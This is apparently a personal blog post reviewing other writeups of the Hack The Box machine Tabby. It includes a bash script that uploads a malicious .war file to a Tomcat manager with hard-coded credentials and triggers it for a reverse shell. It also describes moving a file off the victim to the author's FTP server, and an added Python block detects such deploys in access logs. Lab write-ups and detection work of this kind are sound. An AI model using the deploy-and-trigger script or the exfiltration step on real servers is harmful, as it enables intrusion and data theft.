Learning day part 3: Reading other HTB writeups -- Tabby, and finding new tools

I once received some advice from a dude who is pretty good at this kind of stuff to read other writeups once I've solved a box. This will help because you will discover other techniques you didn't think about or know about.

I'm going to do that right now with Tabby and see if I find some differences in how I solved it vs how others solved it.

Installing Tomcat on your own machine to find the relevant file

When I worked through the box, I wasted a ton of time trying to figure out where this file was.

I called it the trickiest part of the box in my writeup.

This dude on his Medium blog installed Tomcat 9 locally and figured out where the file he was looking for was hosted. This enabled him to get what he needed.

Good thing to keep in mind, but such a drag to have to do when running through a CTF-like challenge. That said, it would have probably taken me less time to install the software and figure out where the file is than it ended up taking for me to guess my way through and fight through Google searches that didn't always turn up the info I was hoping for.

Uploading the .war file

The other writeups I saw did this manually with curl. I wrote a small one-liner that uploaded the file and then ran a second curl GET request to activate it and give me my reverse shell as long as I had my listener running.

I called it upyours.sh:

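#!/bin/bash

# Tomcat manager credentials (single quotes keep the $ and ! literal)
user=tomcat
pass='$3cureP4s5w0rd123!'

# Deploy the WAR through the manager text interface, then request the new context
curl -T "meow.war" -u "$user:$pass" "http://10.10.10.194:8080/manager/text/deploy?path=/myapp&update=true" && curl -X GET "http://10.10.10.194:8080/myapp/"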
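
Seen from the defending side, the upload above leaves a recognizable pair of entries in Tomcat's access log: a PUT to /manager/text/deploy followed by a request to the new context path. The following is an added example, not part of the original post; it assumes the default common-format access log, and the function name and sample lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Assumes Tomcat's default AccessLogValve "common" pattern: %h %l %u %t "%r" %s %b
LINE = re.compile(
    r'(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

def find_text_deploys(lines):
    """Return one finding per PUT to /manager/text/deploy that returned 200,
    plus later requests from the same client to the deployed context path."""
    findings = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if (m["method"] == "PUT" and url.path == "/manager/text/deploy"
                and m["status"] == "200"):
            ctx = parse_qs(url.query).get("path", [""])[0]
            findings.append({"host": m["host"], "user": m["user"],
                             "time": m["ts"], "context": ctx, "followups": []})
            continue
        # Attribute later hits on a deployed context to the client that uploaded it.
        for f in findings:
            if (f["context"] and m["host"] == f["host"] and
                    (url.path == f["context"] or
                     url.path.startswith(f["context"] + "/"))):
                f["followups"].append(f'{m["method"]} {url.path} {m["status"]}')
    return findings

# Constructed sample log lines (documentation-range addresses, not from the box).
SAMPLE = [
    '198.51.100.7 - - [20/Jun/2020:10:15:30 +0000] "GET /manager/html HTTP/1.1" 401 2499',
    '198.51.100.7 - tomcat [20/Jun/2020:10:15:32 +0000] "PUT /manager/text/deploy?path=/myapp&update=true HTTP/1.1" 200 55',
    '198.51.100.7 - - [20/Jun/2020:10:15:33 +0000] "GET /myapp/ HTTP/1.1" 200 0',
    '192.0.2.10 - - [20/Jun/2020:10:16:00 +0000] "GET /myapp/ HTTP/1.1" 200 0',
    '192.0.2.10 - - [20/Jun/2020:10:16:05 +0000] "GET /docs/ HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for finding in find_text_deploys(SAMPLE):
        print(finding)
```

A 200 from the text manager only means the request was authenticated and handled, so each finding is a prompt to check which account was used and whether the deployment was expected.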

Downloading the relevant file

I saw mentions of downloading the relevant .zip file, but didn't see how to do it. I just set up an FTP server that I upload the file to from the victim machine. The FTP server is on my local machine. I just stop the service when I'm done with the upload.

Getting Root

The guides I found used this step-by-step from HackTricks. I went the skid route and used a script that did most of it for me. Found it here, ExploitDB, of course.

The process is similar, but I didn't have to run as many commands. It may be worth revisiting so I can try it manually as well.

New tools

Didn't find any walkthrough that did it drastically differently than what I did. That said, I did find a tool called Final Recon on this blog. Basically, they were promoting their own tool, but still cool. I might give it a try.

Their .war file uploader also kicks my file uploader's butt. It's called WARSend. I still like the name upyours.sh better, though.